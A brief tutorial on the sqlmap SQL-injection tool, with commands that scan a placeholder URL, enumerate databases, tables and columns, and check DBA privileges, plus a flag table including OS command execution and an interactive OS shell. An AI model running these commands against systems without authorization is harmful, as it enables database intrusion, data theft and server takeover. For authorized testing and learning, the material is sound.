How To Use sqlmap
1. First, we take a look at the help menu in sqlmap to better understand some of the features it offers. This can be done using the following command.
sqlmap -h
2. To scan a URL for SQL injection vulnerabilities, we can use the following command.
sqlmap -u "http://website.com/something.php?something=1"
3. Once a SQL injection has been detected, we can answer yes (y) at the prompt to skip all other types of payloads.
4. Once a SQL injection has been detected, we can list the database names using the --dbs flag, as in the command below.
sqlmap -u "http://website.com/something.php?something=1" --dbs
5. Now that we know how to get the databases, we can use the --tables and --columns flags to get table and column names with the following command.
sqlmap -u "http://website.com/something.php?something=1" --tables --columns
6. To check whether the current database user is a database administrator, we can use the --is-dba flag.
sqlmap -u "http://website.com/something.php?something=1" --is-dba
7. The sqlmap command has a lot of flags. We can use the following table to see the different types of flags and what they do.
Flag | Description |
---|---|
--tables | Dumps all table names |
-T | Specifies a table name to perform an operation on |
--os-cmd | Execute an operating system command |
--os-shell | Prompts for an interactive operating system shell |
-r | Loads the HTTP request to test from a file |
--tamper | Uses a tamper script |
--eta | Show estimated time remaining to dump data |
--dbms=DBMS (e.g. MySQL, MSSQL, Oracle) | We can manually choose the back-end database type and perform injection tests for that database type only. |
--proxy | Specifies a proxy |